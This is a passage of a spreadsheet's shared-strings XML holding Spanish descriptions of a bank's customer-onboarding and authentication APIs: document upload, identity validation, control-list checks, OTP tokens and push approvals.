    <t>## **Descripción:** La API Customer Acquisition Persistence habilita las capacidades para registrar la  vinculación finalizada en los maestros de clientes, garantizando la completitud de todas las actividades exigidas por los procesos de conocimiento del cliente. Además, incluye funcionalidades para custodiar los documentos soporte de los procesos de conocimiento del cliente cumpliendo así­ las exigencias normativas. ## **Operaciones**  ###### **Persistir Datos Cliente** Permite dejar en firme la vinculación en los maestro de clientes, modificando el estado de la vinculación en SAP CRM a finalizada, haciendo uso del servicio Gestionar Prospectos. Para habilitar esta capacidad es necesario ejecutar previamente la segmentación y calificalificación del potencial cliente y  además garantizar la firma electrónica del formato F-2486 Conocimiento PN_VinculacioÌ?n Transversal generado en el proceso con la información capturada a través de la API Information NP. ###### **Persistir documentos del Cliente** A través de esta capacidad se realiza la custodia en Oracle de los documentos soporte cargados por el potencial cliente requeridos en la experiencia; esta custodia se efectíºa  haciendo uso del servicio de TDC. Premisas de Persistir Documentos del Cliente: - Para los escenarios del proceso de vinculación esta es la ultima operación a consumir para garantizar la finalización de la solicitud y dar cumplimiento a la norma. - En algunos casos la operación entrega una respuesta de rechazo pero indica que se puede continuar con las gestiones del producto, enviando los documentos a custodiar a través de un proceso de reintentos por lotes. - Este proceso de custodia aplica para documentos que no requieren firma.</t>
  </si>
  <si>
    <t>CustomerAcquisitionDocs</t>
  </si>
  <si>
    <t>Customer Acquisition Documents Digitalization</t>
  </si>
  <si>
    <t>customer-acquisition-documents-digitalization</t>
  </si>
  <si>
    <t>## **Descripción:** Es la API que habilita las capacidades para el cargue y procesamiento de documentos soporte de los proceso de conocimiento del cliente. Lo anterior con el objetivo de extraer su data lí­quida (cuando aplique) o simplemente almacenar aquellos documentos digitalizados que se convierten en soportes del potencial cliente, por ejemplo, documento de identidad, carta laboral, etc. Estos documentos se persistirán en el repositorio oficial del Banco a través de la API Customer Acquisition Persistence, solo si el proceso se finaliza satisfactoriamente, de lo contrario serán desechados. Esta API contempla capacidades que permiten el procesamiento de los documentos de forma sí­ncrona o así­ncrona de acuerdo a los escenarios de conocimiento del cliente a habilitar. Posteriormente, en esta API se incorporará  el cargue y/o procesamiento de documentos adicionales para la vinculación y/o actualización de personas naturales y jurí­dicas. Premisas de la API Customer Acquisition Digitalization: * Solo está habilitado el cargue y procesamiento de documentos en formato .pdf, .jpg, .jpeg, .tif, .tiff o .png. * Se debe garantizar que el tamaí±o de los archivos a cargar no superen el lí­mite máximo permitido, el cual está inicialmente parametrizado en 4 MB. Posteriormente éste se pretende ampliar a 10 MB. * Cuando se requiera procesar documentos de forma así­ncrona, se debe efectuar el cargue a través de la operación cargar documentos, indicando que no se esperará el resultado del procesamiento, éste se debe consultar a través de la operación validar datos extraí­dos. ## **Operaciones**  ###### **Cargar documentos:** A través de esta operación es posible cargar el documento de identidad  y los documentos soporte del proceso de vinculación de los potenciales clientes, inicialmente solo se tendrá habilitado el cargue de cédula de ciudadaní­a y el registro íºnico tributario (RUT) como documento soporte adicional. Lo anterior es posible a través de la herramienta Kofax consumiendo la API Document Management - Digitalization_v1.0.0 Premisas de Cargar documentos: * Permite extraer, a través del procesamiento del documento de identidad, los datos requeridos para ejecutar la etapa 1 de la validación de identidad (comparación de datos de identidad - Reconocer) * Tiene parametrizado un níºmero máximo de reintentos para cada subtipo documental, una vez se superan se cancela la solicitud. * Esta capacidad habilita el diligenciamiento manual de algunos campos presentes en la cédula de ciudadaní­a cuando Kofax realiza un procesamiento parcial del documento. * Los datos extraí­dos se almacenan como parte de los datos personales del cliente y no se permite su edición posteriormente. * Permite extraer información del RUT para verificar la actividad económica de algunas ocupaciones parametrizadas en el componente. * Habilita para el consumidor la posibilidad de indicar a través de variables de entrada si el subtipo documental requiere solo carga o carga mas procesamiento,  asimismo permite indicar si el procesamiento es sí­ncrono o así­ncrono. ###### **Validar datos extraidos:** A través de esta operación es posible consultar el resultado del procesamiento de los documentos cargados en la operación cargar documentos, siempre y cuando se haya indicando en el cargue la ejecución de proceso de manera así­ncrona.  Premisas de Validar Datos Extraí­dos: * La respuesta de esta operación es la misma que se entrega al consumidor en Cargar Documentos, se diferencias en tiempo de procesamiento. * En los escenarios de vinculación parametrizados inicialmente en el componente, no se contempla el uso de esta operación, dado que el procesamiento del documento de identidad y del RUT es prerrequisito de las actividades predecesoras de esta validación. Se debe asegurar revisión funcional previo a parametrizarla en un escenario de vinculación.</t>
  </si>
  <si>
    <t>Customer Acquisition Security</t>
  </si>
  <si>
    <t>Customer Acquisition Identity</t>
  </si>
  <si>
    <t>customer-acquisition-identity</t>
  </si>
  <si>
    <t>## **Descripción:** La API Customer Acquisition Identity habilita las capacidades para validar la identidad del potencial cliente, asegurando que quien adelanta el proceso es quien dice ser, lo anterior es posible a través de los siguientes mecanismos:  - Comparación de datos de identidad contra fuentes externas  - Generación y validación de preguntas reto A través del primer mecanismo, se comparan los datos suministrados por el potencial cliente en el Producto Customer Acquisition Data y los datos extraí­dos a partir del documento de identidad versus los datos del potencial cliente entregados por fuentes externas avaladas por el Banco. El segundo mecanismo, habilita un cuestionario de preguntas reto, soportadas en Información almacenada en las centrales de riesgo sobre el potencial cliente a validar. Inicialmente este mecanismo se soporta en el Servicio Evidente (API Customer Risk - Validate Identity). ## **Operaciones**  ###### **Validar Identidad Cliente** A través de esta operación es posible validar la identidad del potencial cliente o representante legal, comparando los datos del documento de identidad contra las fuentes de información externas avaladas por el Banco. Inicialmente se hará uso de Experian como fuente externa, a través del Servicio Reconocer, el cual corresponde a la primera etapa de la Operación Validar identidad del cliente. Este servicio consume la API Customer Profile Information - Private External Sources. Esta operación evalíºa la vigencia del documento de identidad reportado por la fuente externa y determina el puntaje obtenido en la comparación de los datos suministrados por el cliente versus los datos entregados por la fuente externa.  El puntaje de coincidencia es un valor que se compara contra los umbrales parametrizados dentro del componente y éstos pueden variar de acuerdo al escenario de vinculación y las necesidades del negocio. Para definir si la validación de identidad es exitosa se tienen en cuenta las siguientes premisas: Escenario 1: El puntaje de coincidencia está entre el umbral mí­nimo y máximo parametrizados, en este caso, se debe llevar a cabo la activación de preguntas reto. La operación entrega esta instrucción en la respuesta. Escenario 2: El puntaje de coincidencia está por encima del umbral máximo parametrizado, en este caso la validación de identidad es exitosa, el potencial cliente puede continuar el proceso de vinculación sin aplicar las operaciones de preguntas reto, el estado de éstas se marca como "Completado Automáticamente". Escenario 3: El puntaje de coincidencia está por debajo del umbral mí­nimo parametrizado, en este caso la validación de identidad NO es exitosa, no se puede continuar con el proceso y se cancela la solicitud de vinculación. - Cuando el documento de identidad no está vigente de acuerdo a los datos entregados por la fuente externa, esta capacidad cancela la solicitud sin activar la comparación de datos. - Cuando la Operación "Cargar documentos" se encuentra en estado "Diligenciar manualmente", es obligatorio el llamado a las operaciones de Preguntas reto. - Cuando el celular y/o correo electrónico no coincidan con la fuente externa Experian, es obligatorio el llamado a las operaciones de Preguntas reto. ###### **Exponer Preguntas Reto** Esta operación se activa de acuerdo al resultado de la operación Validar Identidad para asegurar la validación de identidad del potencial cliente. Así­ mismo, se activa:  - Cuando el puntaje de coincidencia está entre el umbral mí­nimo y máximo   - Cuando el potencial cliente no está registrado en Experian  - Cuando la información del documento de identidad debe diligenciarse manualmente  - Cuando el celular y/o correo electrónico no coinciden con los reportados en Experian  Premisas de la Operación Exponer Preguntas Reto: - La operación Exponer Preguntas Reto permite generar y presentar un cuestionario de 4 preguntas con 4 opciones de respuesta cada una, éstas son generadas de manera aleatoria basadas en el historial crediticio e información del potencial cliente registrada en las centrales de riesgo.  - El potencial cliente debe seleccionar la respuesta correcta dentro de un conjunto de opciones disponibles y  éstas se entregan para su validación a la operación Validar Preguntas Reto. - El Servicio de Experian cuenta con un níºmero máximo de intentos parametrizada para la generación de preguntas reto, por dí­a, mes y aí±o, cuando éste se supera, se cancela la solicitud de vinculación y se genera un bloqueo temporal sobre el potencial cliente, evitando que intente crear nuevas solicitudes a través del Componente. Lo anterior se realiza con el propósito de no generar gastos adicionales a raí­z de las consultas a Experian, teniendo en cuenta que el proveedor continuará enviando error por los intentos superados hasta que se cumpla el tiempo de bloqueo. ###### **Validar Preguntas Reto** A través de esta operación es posible validar la identidad del potencial cliente verificando la consistencia de las respuestas entregadas a las preguntas expuestas previamente en la operación Exponer Preguntas Reto y es Experian quien informa si se aprueba o no la validación de identidad.</t>
  </si>
  <si>
    <t>Customer Acquisition Images And Documents Management</t>
  </si>
  <si>
    <t>customer-acquisition-images-and-documents-management</t>
  </si>
  <si>
    <t>## **Descripción:** Esta API habilita las capacidades para generar y exponer el formato de conocimiento del cliente en el proceso de vinculación. De igual forma, permite ejecutar la firma electrónica y custodia del formato previamente diligenciado con la información ingresada por el potencial cliente en la API Customer Acquisition Information PN. Antes de habilitar el llamado a esta API, se deben consumir las capacidades de la API Information PN. ## **Operaciones**  ###### **Generar y exponer documentos:** A través de esta operación es posible consolidar, en una plantilla .pdf del formato de conocimiento del cliente, la información recolectada mediante las operaciones de la API Customer Acquisition Information PN, como soporte del proceso de vinculación.  El formato se guarda temporalmente en el componente  y se genera una URL que lo expone al consumidor, ésta tiene un tiempo de vigencia de 5 minutos, pasado este tiempo la URL expira.   Esta operación genera 2 copias del formato de conocimiento del cliente, una versión encriptada que se comparte al cliente a ví­a correo electrónica y otra que se firma electrónicamente y se custodia en el repositorio oficial del Banco. Posteriormente, será posible incorporar nuevas plantillas para los escenarios de conocimiento del cliente que se vayan habilitando en el componente. ###### **Firmar y custodiar documentos:** A través de esta operación es posible firmar electrónicamente el formato de conocimiento del cliente generado en la experiencia de vinculación, este es el soporte jurí­dico del proceso.  Esta operación hace uso de la API Document Management - Digital Signature_v1.0.0 Premisas de la Operación Firmar y custodiar documento: * Se debe asegurar la ejecución exitosa de las operaciones prerrequisito, entre ellas, generar y validar token, generar y exponer documentos y las demás parametrizadas en el componente. * Asegura la generación del archivo de trazabilidad a adjuntar en el formato de conocimiento del cliente para garantizar las condiciones de no repudio.   * La API a reusar es responsable de asegurar la custodia del formato de conocimiento del cliente, así­ mismo, es la encargada de controlar los reintentos en caso de falla.</t>
  </si>
  <si>
    <t>Customer Acquisition Information NP</t>
  </si>
  <si>
    <t>customer-acquisition-information-np</t>
  </si>
  <si>
    <t>## **Descripción:** Es la API que habilita las capacidades para capturar los datos del cliente o potencial cliente Persona Natural, con el fin de obtener los datos necesarios para los procesos de conocimiento del cliente y dar cumplimiento a las exigencias normativas. En ese orden de ideas, el cliente o potencial cliente suministra sus datos personales, básicos, de contacto, económicos, tributarios y de moneda extranjera, los cuales también son necesarios para entender su contexto. Posteriormente, esta API contará con la capacidad de precargar información del cliente o potencial cliente a partir de fuentes internas y externas avalados por el banco, buscando minimizar la cantidad de información que debe diligenciar en los proceso de conocimiento del cliente. Premisas de la API Customer Acquisition Information NP: '¢Todos los campos de la captura de información son opcionales dentro del mapeo de datos de entrada de las operaciones (Exceptuando el Acquisition ID, el tipo y níºmero de documento), sin embargo, dependiendo del escenario del proceso de conocimiento del cliente que aplique, el Componente validará su obligatoriedad. '¢Adicionalmente, si una vez finalizada la captura de información, el cliente o potencial cliente desea modificar algíºn campo, se podrán realizar consumos posteriores a las operaciones para entregar la información a modificar. Sin embargo, se debe tener presente que la actualización de los campos usados en validaciones internas está sujeta a la parametrización del escenario que le aplique al cliente o potencial cliente. ## **Operaciones**  ###### **Capturar Información Personal** A través de esta operación el cliente o potencial cliente suministra sus datos personales al proceso de conocimiento del cliente, estos datos corresponden a los encontrados en el documento de identidad y datos de contacto básicos que permitirán habilitar, entre otros procesos, la validación de identidad. Premisas de Capturar Información Personal: - Los datos del documento de identidad serán de obligatorio diligenciamiento en los escenarios de vinculación donde no se realiza procesamiento del documento de identidad. - Para los escenarios de vinculación que requieren digitalización del documento de identidad, se ejecuta el diligenciamiento automático de los campos asociados al documento en esta operación y éstos serán visibles en el formato de conocimiento del cliente. - Los datos de contacto básicos corresponden al celular y correo electrónico asociados al tipo de dirección residencial, estos datos se validan contra el resto de las solicitudes de vinculación activas en el componente, en caso de estar asociados a otra solicitud (el mismo níºmero de celular y/o el mismo correo electrónico), se procede a generar una error para solicitar la modificación de los datos por sospecha de pitufeo, siempre y cuando se iguale o supere el parámetro Níºmero Máximo de Solicitudes Activas con un mismo correo electrónico y/o níºmero de celular. ###### **Capturar Información Básica** A través de esta operación,  el cliente o potencial cliente suministra sus datos básicos para los procesos de conocimiento del cliente, éstos corresponden a información sociodemográfica y algunos datos del documento de identidad. ###### **Capturar Información de Contacto** A través de esta operación el cliente o potencial cliente suministra sus datos de contacto para llevar a cabo los procesos de conocimiento del cliente que apliquen. Premisas de Capturar Información de Contacto: - La operación permite el ingreso de dos tipos de dirección: residencial o laboral.  - Un cliente o  potencial cliente solo podrá tener una dirección de cada tipo y solo una podrá estar marcada como dirección de correspondencia.  - El celular y correo electrónico asociados a la dirección residencial serán los que se ingresen en la operación Capturar Datos Personales y no se permitirá su modificación al hacer el llamado a la operación Capturar datos contacto. ###### **Capturar Información Económica** A través de esta operación el cliente o potencial cliente suministra sus datos económicos para llevar a cabo los procesos de conocimiento del cliente que apliquen. Tanto en esta operación como en Capturar Información Tributaria algunos campos cambiarán su obligatoriedad de acuerdo a la ocupación que ingrese el cliente o potencial cliente, este comportamiento es parametrizable para cada escenario. ###### **Capturar Información Tributaria** A través de esta operación el cliente o potencial cliente suministra sus datos tributarios y otros datos requeridos por normatividad SARLAFT para llevar a cabo los procesos de conocimiento del cliente que apliquen. Premisas de Capturar Información Tributaria - En esta operación se diligencia la información para la autocertificación fiscal de FATCA y CRS, la operación está en capacidad de recibir la autocerficacion tanto de FATCA como de CRS en dos preguntas independientes, sin embargo inicialmente se integraron en una sola pregunta que aborda ambas normativas y se expone en el formato F-2486, de acuerdo a la respuesta de esta pregunta el cliente o potencial cliente podrá relacionar la lista de paí­ses y sus IDs tributarios correspondientes. - La obligatoriedad de los campos paí­s y ID tributario dependerá de la respuesta dada por el cliente o potencial cliente a la pregunta de tributa o no como residente o ciudadano en los Estados Unidos o en otros paí­ses diferentes a Colombia. - Tanto en esta operación como en Capturar Información Económica algunos campos cambiarán su obligatoriedad de acuerdo a la ocupación que ingrese el cliente o potencial cliente, este comportamiento es parametrizable para cada escenario. ###### **Capturar Información de Moneda Extranjera** A través de esta operación el cliente o potencial cliente suministra sus datos de moneda extranjera para llevar a cabo los procesos de conocimiento del cliente que apliquen. Premisas de Capturar Información de Moneda Extranjera: - Si el cliente o potencial cliente realiza operaciones en moneda extranjera, deberá relacionar de forma obligatorio el detalle de sus operaciones y productos.  - La operación solo admite un registro por cada tipo de transacción indicada.</t>
  </si>
  <si>
    <t>Customer Acquisition Management</t>
  </si>
  <si>
    <t>customer-acquisition-management</t>
  </si>
  <si>
    <t>## **Descripción:** Es la API principal del proceso de vinculación de clientes pues corresponde al punto de entrada a una nueva vinculación. Habilita las capacidades para iniciar un proceso de vinculación, verificar su estado, consultar cuáles son las instrucciones y cláusulas y su aceptación/declinación.  Todo proceso de vinculación debe obligatoriamente iniciar por esta API, la cual proporciona un ID íºnico de vinculación que será necesario para consumir las demás APIs requeridas en el proceso y de esta manera llevar el control y la trazabilidad de éste. ## **Operaciones**  ###### **Iniciar vinculación:** A través de esta operación se da inicio a una nueva solicitud de vinculación; se recibe por parte de los canales/consumidores un set de parámetros que permiten perfilar el tipo de vinculación que se debe realizar, es decir, le permite al Componente Transversal de Vinculación identificar las actividades que deben ser completadas para vincular correctamente a un potencial cliente.  La operación Iniciar Vinculación, retorna el Id íºnico de vinculación el cual permite llevar el control y trazabilidad del proceso, un potencial cliente puede tener varias solicitudes de vinculación activas, cada una con diferente Id, siempre y cuando el producto, canal o lí­nea de negocio sean diferentes. Premisas de Iniciar Vinculación:  - Si un potencial cliente tiene varias solicitudes activas, cuando una de ellas finalice exitosamente, las otras se marcarán automáticamente como canceladas.  - Si un potencial cliente inicia una vinculación y ya tiene una activa con el mismo producto, canal o lí­nea de negocio, el Componente no permitirá crearla de forma exitosa, en su lugar, retornará una excepción de negocio alertando sobre esta situación y brindandole al potencial cliente la opción de retoma o la opción de esperar a que ésta se cancele automáticamente por vigencia.  - Una solicitud de vinculación tendrá una vigencia de 24 horas (tiempo parametrizable a nivel funcional con previa validación y aprobación del área Jurí­dica, de Seguridad y Cumplimiento), contadas a partir de la fecha y hora de creación de la misma, cumplido este tiempo, si la vinculación aun se encuentra activa, se marcará automáticamente como 'Cancelada por vigencia'?. ###### **Consultar instrucciones y cláusulas:** A través de esta operación, es posible indicarle al consumidor cuáles son los documentos requeridos y cláusulas para el proceso de vinculación, dependiendo del escenario de vinculación pueden presentarse variaciones en las instrucciones y cláusulas a presentar. ###### **Aceptar cláusulas:** A través de esta operación se proporciona un mecanismo de aceptación de cláusulas al proceso de vinculación iniciado; es posible recibir dos respuestas, SI (Aceptación de cláusulas) o NO (No aceptación de cláusulas). ###### **Consultar estado de la solicitud:** A través de esta operación es posible conocer el estado actual de una solicitud de vinculación y de todas sus actividades/steps/operaciones. Premisas de la Operación Consultar estado de la solicitud: Una solicitud de vinculación puede tener los siguientes estados:   **Activo:**  Estado de la solicitud cuando tiene actividades pendientes por completar.  **Cancelado:**  Estado de la solicitud que se asigna  cuando ésta se interrumpe en alguna etapa del proceso, puede darse por cualquiera de las siguientes causales:   - El potencial cliente no acepta cláusulas.   - El potencial cliente no superó exitosamente las validaciones del proceso (Listas de control, validación de identidad, calificación de riesgo LAFT, etc.) o se presentaron fallas en el reuso de servicios.   - Hubo otra solicitud de vinculación con variables de entrada diferentes que finalizó correctamente. (Producto, canal, lí­nea de negocio  **Finalizado:** Estado de la solicitud que se asigna cuando se han completado todas las actividades parametrizadas en el escenario de vinculación correctamente.   Las solicitudes que ingresan al Componente y se perfilan como 'Actualizar cliente'? o 'Apertura de Producto'?, también quedan en estado Finalizado.  **Cancelado por vigencia:** Estado de la solicitud que se asigna cuando han pasado 24 horas a partir de la creación de la solicitud y ésta aun se encontraba activa. Esta es una directriz desde seguridad y es un valor parametrizable.  **Pendiente marcación:** Estado de la solicitud que se asigna cuando al realizar la calificación de riesgo LAFT ésta indica que el potencial cliente no es apto para continuar con el proceso de vinculación, se deja en este estado para asegurar que se consuma la operación Marcar Cliente en Listas de Control, evitando así­ que el potencial cliente cree una nueva solicitud y modifique los datos de entrada que dieron lugar a la calificación no apta.  **Pendiente publicación:** Estado de la solicitud que se asigna cuando falla la publicación en Oracle de los documentos soporte de la vinculación y es el mecanismo que permite identificar las solicitudes a incluir en el proceso batch de reintentos de publicación.  **Pendiente notificación:** Estado de la solicitud que se asigna cuando falla el enví­o de la notificación al cliente  ví­a email con el formato de conocimiento adjunto y se requiere para monitoreo y gestiones posteriores desde la operación. Una actividad/paso/step/operación puede tener los siguientes estados:   **Pendiente:** Estado que indica que la actividad/operación/paso está en proceso o no ha sido iniciada.  **Completado:** Estado que indica que la actividad/operación/paso ha sido finalizada de manera exitosa.  **Rechazado:** Estado que indica que el potencial cliente no superó exitosamente las validaciones de la actividad/operación/paso.  **Escalado:** Estado exclusivo para la etapa de validación de identidad, con este estado se indica que el potencial cliente no finalizó exitosamente la primera etapa y se escala a una segunda etapa para validad su identidad con preguntas reto.  **Bloqueado:** Estado exclusivo para las operaciones de generar y validar token cuando se superaron los intentos permitidos para la generación y envió del OTP o su validación. Se bloquea temporalmente las operaciones por directriz de seguridad.   **Completado Automáticamente:** Estado que se aplica a las operaciones de generar  y validar preguntas reto, cuando el potencial cliente supera satisfactoriamente la validación de identidad en la etapa 1.  O en la operación de cargar documento cuando de acuerdo a la ocupación del potencial cliente no requiere aportar el RUT como documento soporte.   **Completado Parcialmente:** Estado para indicar avance de operaciones/actividades que se deben consumir en varios momentos del proceso.  Aceptar clausulas: Se marca en este estado cuando se acepta una de las cláusulas y aun quedan clausulas pendientes por aceptar.  Cargar documentos: Se marca en este estado cuando se procesa exitosamente el primer documento soporte de la vinculación.  **Diligenciar Manualmente:** Estado exclusivo para la etapa del cargue de documento de identidad e indica que kofax procesó parcialmente el documento, se requiere que el cliente diligencie manualmente algunos de los campos del documento para continuar.</t>
  </si>
  <si>
    <t>Customer Acquisition Profiling</t>
  </si>
  <si>
    <t>customer-acquisition-profiling</t>
  </si>
  <si>
    <t>## **Descripción:** La API Customer Acquisition Profiling habilita las capacidades para perfilar al cliente desde el punto de vista de negocio, identificando el proceso que le aplica:  Actualización, Vinculación o Apertura de producto cuando no requiere ninguna gestión de Conocimiento del Cliente. Así­ mismo identifica si el potencial cliente a vincular es exclusivo de BALM a partir del segmento registrado en los maestros de clientes. Esta API también permite realizar la segmentación comercial del potencial cliente. ## **Operaciones**  ###### **Perfilar Cliente:** Permite realizar la perfilación de negocio al potencial cliente, con el objetivo de identificar cuál es la acción a seguir en el proceso.  Las acciones a seguir pueden ser las siguientes:   * Vincular Prospecto  * Vincular prospecto - Exclusivo BALM  * Actualizar Cliente  * Apertura Producto, en caso de que no requiera gestiones de conocimiento del cliente. Esta operación hace uso de los servicio de MDM Consulta Básica de Clientes y Datos de Gestión Comercial. ###### **Segmentar Cliente:** Permite realizar la segmentación comercial al potencial cliente, la cual se determinará de acuerdo con sus diferentes variables financieras, económicas, etc. retornando el segmento al cual quedó asignado.  El segmento es un dato necesario para registrar al potencial cliente en el maestro de clientes. Actualmente esta operación permite ejecutar la calificación de riesgo LAFT, para identificar si el potencial cliente es apto o no para continuar con el proceso de vinculación. Esta operación hace uso del servicio Gestionar Prospectos de SAP CRM para realizar el primer registro/modificación del potencial cliente en el sistema. Para hacer uso de esta capacidad es necesario que previamente se hayan capturado los datos del potencial cliente: Personales, básicos, de contacto, económicos, tributarios y de moneda extranjera.</t>
  </si>
  <si>
    <t>Customer Acquisition Validation</t>
  </si>
  <si>
    <t>customer-acquisition-validation</t>
  </si>
  <si>
    <t>## **Descripción:** Es la API que habilita las capacidades para ejecutar las validaciones requeridas para adelantar los procesos de conocimiento del cliente dando cumplimiento a la normatividad SARLAFT, aportando a la reducción de riesgos en los procesos, además de dar cumplimiento a los lineamientos del modelo de firma electrónica acogido el Banco. Posteriormente, en este producto de APIs se incorporará la capacidad para validar la consistencia del representante legal de un cliente o potencial cliente Persona Jurí­dica, además la calificación de riesgo LAFT a través de SCOVIC. Premisas de la API Customer Acquisition Validation: * La validación en listas de control es obligatoria para los escenarios de vinculación parametrizados en el Componente de Vinculación, para ello se realizan dos consultas en los reportes de listas, una por tipo y níºmero de documento y otra por nombre completo. Es importante tener presente que inicialmente el Componente no admitirá la vinculación para potenciales clientes que figuren con alerta o bloqueo en listas de control, estas solicitudes se cancelan automáticamente. * La marcación de clientes NO objetivo inicialmente se aplica para potenciales clientes que no sean aptos para continuar el proceso de vinculación debido a su calificación de riesgo LAFT, esta operación es obligatoria para todos los escenarios que estén parametrizados en el Componente. * La generación y validación de token es de caracter obligatorio para todos los procesos de conocimiento del cliente que exijan firma electrónico en los formatos generado durante la experiencia. ## **Operaciones**  ###### **Validar Listas de Control** A través de esta operación es posible identificar si el potencial cliente o representante legal, se encuentra reportado en alguna categorí­a de listas de control, haciendo uso del servicio Check Control List/Servicio de Listas de Control. El resultado de la validación puede tener los siguientes valores: * El potencial cliente no se encuentra reportado en listas de control.  * El potencial cliente se encuentra reportado en listas de control en categorí­a de alertas.  * El potencial cliente se encuentra reportado en listas de control en categorí­a de bloqueos. Premisas de Validar Listas de Control: - Es una operación de consumo obligatorio en los escenarios parametrizados en el Componente. - Esta operación se debe consumir después de capturar el nombre completo del cliente, preferiblemente desde el documento de identidad, es decir, se debe ejecutar posterior a la operación Cargar documentos con el documento de identidad. - En la respuesta entregada al consumidor se detalla, en caso de encontrar al potencial cliente reportado en listas de control, si corresponde a alerta o bloqueo y la categorí­a en la cual se encuentra marcado. **Esta información es de caracter confidencial y por ningíºn motivo se debe entregar al cliente o potencial cliente.** ###### **Marcar Cliente No Objetivo** A través de esta operación, se valida si el cliente o potencial cliente debe ser marcado en listas de control por novedades asociadas a la detección de clientes no objetivo para el Banco, ésta es de consumo obligatorio para cualquier escenario de vinculación parametrizado en el Componente. Un cliente o potencial cliente identificado como "no objetivo" es aquel que presenta comportamientos atí­picos o inconsistencias en la información suministrada durante el proceso de conocimiento del cliente. Esta operación hace uso de una API externa al Componente denominada Control List Management. Inicialmente esta marcación se aplicará sobre aquellos potenciales clientes cuya calificación SARLAFT no es apta para llevar a cabo el proceso de vinculación a través del Componente, de esta manera garantizamos que el potencial cliente no pueda crear una nueva solicitud modificando los datos y que los equipos comerciales identifiquen los potenciales clientes que iniciaron un proceso de vinculación por el Componente y requieren mayor debida diligencia.  Posteriormente, se espera que cuando falle la verificación de identidad, se detecte la entrega de información fraudulenta, o desde fuentes externas se identifique que el potencial cliente es fraudulento, se espera marcarlo en una lista de control como cliente no objetivo y no se permitirá continuar con el proceso de conocimiento del cliente. ###### **Generar Token** A través de esta operación es posible generar un código o token para validar al potencial cliente mediante el mecanismo OTP (One-Time Password). Inicialmente, esta operación será usada para firmar electrónicamente el Formato de Conocimiento del Cliente. Esta operación hace uso de una API externa al Componente denominada Token - Management. Premisas de Generar Token: - El token es enviado al correo electrónico y ví­a SMS al celular entregados por el potencial cliente. - Previo a la generación del token, el Componente valida que el cliente o potencial cliente tenga una solicitud  activa.   - Si no se especifica un correo o níºmero de celular en la entrada de la operación, el Componente valida si previamente ya se han capturado estos datos en algíºn paso anterior en el proceso de conocimiento del cliente, en caso de no encontrar datos se lanza un error  indicando que no se ha especificado un correo o níºmero de celular para el enví­o del token. Tienen prioridad los datos ingresados previamente a través del Producto Customer Acquisition Data. - Por restricciones a nivel de seguridad, esta operación cuenta con un níºmero máximo de intentos parametrizados, una vez el cliente o potencial cliente supere el níºmero de intentos, se genera un bloqueo que impide la generación del token durante un tiempo parametrizable. - Es posible parametrizar las actividades/operaciones prerrequisito para el consumo de la operación Generar Token en los diferentes escenario de conocimiento del cliente parametrizados en el Componente.   ###### **Validar Token** A través de esta operación es posible comprobar si el token ingresado por el cliente o potencial cliente es válido, verificando su existencia y vigencia.  Una vez se compruebe la validez del token, es posible afirmar que el potencial cliente ha tenido una validación exitosa. Esta operación hace uso de una API externa al Componente denominada Token - Management. Premisas de Validar Token: - El cliente o potencial cliente debe ingresar durante la experiencia, el token enviado al correo electrónico y ví­a SMS al celular que suministró previamente. - Previo a la validación del token, el Componente valida que el cliente o potencial cliente tenga una solicitud  activa.   - Por restricciones a nivel de seguridad, esta operación cuenta con un níºmero máximo de intentos parametrizados, una vez el cliente o potencial cliente supere el níºmero de intentos, se genera un bloqueo que impide la validación del token durante un tiempo parametrizable. - Es posible parametrizar las actividades/operaciones prerrequisito para el consumo de la operación Validar Token en los diferentes escenario de conocimiento del cliente parametrizados en el Componente. Es obligatorio ejecutar la operación Generar Token previo a la validación del mismo.</t>
  </si>
  <si>
    <t>Customer Authentication</t>
  </si>
  <si>
    <t>Customer Authentication - OTP</t>
  </si>
  <si>
    <t>customer-authentication-otp</t>
  </si>
  <si>
    <t>El api de OTP, que dentro del ecosistema pertenece al área de seguridad.  Para la autenticación fuerte en los canales virtuales se utiliza OTP que es la clave dinámica, que permite generar un segundo factor de autenticación para tener más seguridad en las transacciones.  Los canales que consuman esta API deben enviar un Sharedkey que generalmente está compuesto por: tipo de documento, numero de documento y canal, aunque cada canal tiene autonomí­a sobre esta generación; esto sirve para identificar al cliente de manera íºnica en detect ID, que es la plataforma que genera la clave dinámica, la clave dinámica es un níºmero llamado OTP técnicamente.  Para autenticar el OTP se debe tener en cuenta si este fue generado por softoken o por ODA que es SMS o email, para poderlo autenticar adecuadamente.</t>
  </si>
  <si>
    <t>EnrolarClienteOTP/V2.0, 
AutenticarClienteOTP/V2.0
GenerarOTP/V2.0</t>
  </si>
  <si>
    <t>AppInversiones_AW1185001 _x000D_
 PEP_AW1128</t>
  </si>
  <si>
    <t>EASYHOME_NU0004001</t>
  </si>
  <si>
    <t>Customer Authentication - Otp</t>
  </si>
  <si>
    <t>Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000D_
 DELFINWEB_AW0748001 _x000D_
 EASYHOME_NU0004001 _x000D_
 JornadaPagos_AW1316001 _x000D_
 PEP_AW1128</t>
  </si>
  <si>
    <t xml:space="preserve">EnrolarClienteOTP/V2.0
AutenticarClienteOTP/V2.0
GenerarOTP/V2.0
</t>
  </si>
  <si>
    <t>Customer Authentication - Otp Management</t>
  </si>
  <si>
    <t>customer-authentication-otp-management</t>
  </si>
  <si>
    <t>Permite la gestión y administración con tres capacidades en relación a la clave dinámica.  1.	Consultar la información completa de bloqueo global sobre un cliente identificado por sharedKey.  2.	Bloqueo de un cliente identificado por sharedKey. 3.	Desbloqueo de un cliente identificado por sharedKey.</t>
  </si>
  <si>
    <t>Customer Authentication - push messages</t>
  </si>
  <si>
    <t>customer-authentication--push-messages</t>
  </si>
  <si>
    <t>Este servicio permitirá la implementación del segundo factor de autenticaciones Push, que evita que el cliente deba diligenciar un código en cualquier interfaz, sino que va a poder autenticar si compra en un celular en primer contacto aceptando a declinando en el primero contacto de mensaje a su celular.  El servicio expone los métodos necesarios para generar notificaciones Push, enviados al dispositivo móvil registrado por un cliente, para aprobar o rechazar Información de la transacción.</t>
  </si>
  <si>
    <t>Customer Authentication - Push Messages</t>
  </si>
  <si>
    <t>customer-authentication-push-messages</t>
  </si>
  <si>
    <t>Customer Behavioral Models</t>
  </si>
  <si>
    <t>Customer Behavioral Models - Behavioral</t>
  </si>
  <si>
    <t>customer-behavioral-models-behavioral</t>
  </si>
  <si>
